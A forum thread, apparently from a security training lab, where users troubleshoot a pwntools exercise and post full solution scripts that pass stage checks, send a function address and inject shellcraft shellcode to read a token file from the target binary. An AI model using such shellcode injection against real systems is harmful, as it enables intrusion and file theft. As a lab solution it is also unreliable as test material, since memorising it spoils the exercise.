Forum Discussion
Bronze INeed Help for Pwntools: Ep. 6 — Demonstrate Your Skills
well, as indicated in reddit sub:
... shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0) shellcode = asm(shellcode) print ("Sending Shellcode:",shellcode, " ---#") io.send(shellcode) io.sendline() ...should work.
looking at my old solution I see that I remote connected:
io = remote('10.102.180.68',5000)somehow I don't see this in your code.
could it be (it's been a long time) that you're working on the wrong endpoint?
Bronze II'm having real difficulties with this one. if I run it locally on my host, I am able to return my own token but I get a seg fault. If I then move it across to remote using socat I do not get the token returned. This is what I have:
from pwn import *
import re
context.arch = 'amd64'
context.os = 'linux'
def main():
r_tube = process("/opt/demonstrate-challenge")
r_tube.recvuntil(b"The output may not display correctly in a terminal, so it may be safer to print it as a hexdump.")
shellcode = shellcraft.cat2('/home/token-user/token.txt', 1, 40) + shellcraft.ret(0)
shellcode = asm(shellcode)
r_tube.send(shellcode)
data = r_tube.recvall(5)
print(hexdump(data))
if __name__ == "__main__":
main()
I've tried the shell code in every which way and as I say I can get it locally but not remote, trying to run it on socat through my dev box it fails as well so I suspect it's something with socat that's not working as I expect. Wouldn't mind a nudge as I've spent a few months on and off on this to no avail.
IotS2024Bronze III
I think there is some steps missing in your code. Go up take the provided code and make the adjustments in the replies and it should work.
- talnet23
Thanks for coming back to me, sorry I removed some of the steps for brevity but this is the full code that works fine locally but not though the remote connection:
from pwn import * import re context.arch = 'amd64' context.os = 'linux' def main(): r_tube = process("/opt/demonstrate-challenge") #r_tube = remote("127.0.0.1", 1234) print("Stage 1") r_tube.recvuntil(b"What is the sum of") line = r_tube.recvline().decode() nums = [int(x) for x in line.strip().replace('?', '').split(' and ')] answer = nums[0] + nums[1] r_tube.sendline(str(answer).encode()) print("Stage 2") r_tube.recvuntil(b':') r_tube.recvline() line = r_tube.recvline().decode().strip() val1, val2 = [int(x) for x in line.split(" and ")] packed = p32(val1) + p32(val2) r_tube.send(packed) print("Stage 3") elf = ELF('/opt/demonstrate-challenge') parsing_check_addr = elf.symbols['parsing_check'] r_tube.sendline(str(parsing_check_addr)) print("Stage 4") shellcode = shellcraft.cat2('/home/token-user/token.txt', 1, 40) + shellcraft.ret(0) shellcode = asm(shellcode) r_tube.send(shellcode) data = r_tube.recvall(5) print(hexdump(data)) if __name__ == "__main__": main()Again I get a SegFault with this and copying the code above I get a SegFault too and both of which provide the token.txt locally but not through the remote connection.
- IotS2024
Okay :) For me the following worked (just a part):
# Generate shellcode to read the file using pwntools shellcraft context.arch = "amd64" # Generate shellcode using shellcraft to read file and print the content as hex shellcode = asm(shellcraft.cat2("/home/token-user/token.txt")) # Print out the shellcode in hexadecimal for easy inspection print("Generated Shellcode:") print(shellcode.hex()) # Print shellcode in hex format for debugging # Send the shellcode payload conn.sendline(shellcode)I tried a lot of different approaches until i found this one. try it out.
It is the arch and an easier shellcode generation.
